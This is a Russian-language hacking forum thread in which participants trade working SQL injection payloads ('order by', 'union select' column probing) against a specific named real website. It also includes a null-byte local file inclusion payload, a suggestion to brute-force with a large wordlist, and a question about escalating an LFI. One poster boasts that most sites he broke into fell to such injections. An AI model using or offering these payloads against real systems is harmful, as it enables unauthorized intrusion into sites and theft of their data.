krypt3r
бред.. тот же самый результ изза ?
инклуд будет когда:
http://site.com/index.php?page=views&id=2
тогда:
http://site.com/index.php?page=..index.php%00&id=2

Octave_Parango
есть прога сипт.. качаеш мега словяк и вперед брутить..

Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?

пробуй +order+by+5000000 --
либо без плюсов, просто пробелы. Либо +group+by+1 -- и т.д.

вобщем вот: http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4--
а если вести http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4/* , то уже совсем другое вылазиет)

полей вроде 4

+group+by+1 вроде ошибок нет)

что дальше делать ?)))

http://cod5.nov.ru/serverstats.php?serverid=1+order+by+4-- - почувствуй разницу вот http://cod5.nov.ru/serverstats.php?serverid=1+order+by+5-- ???? НУ как??? А то хрень, что написал "Ghost0ff" все БРЕЕЕЕЕДДДД!!! Все делается Э Л Е М Е Н Т А Р Н О ! Можно и без group by !! Главное правильно поставить ' и - ! Практический все сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - ! Ну это обычно в твоем случае ничего ставить ненадо! Насчет поста "geforse" ты знаешь скорей самое простое это вообще ничего не ставить после "4" ))) Воть так http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4 - удачи))

И зачем так нужно делать? Особенно если учесть что это не правильно.
Так нужно делать только потому что ты не знаком с синтаксисом SQL?

Хммм в большенстве случаев этот вариант прокатывает!!!

Скул инж. я еще хоть как нить знаю но вот с PHP может кто нибуть поможет???

Почитай здесь:
http://forum.antichat.ru/thread12123.html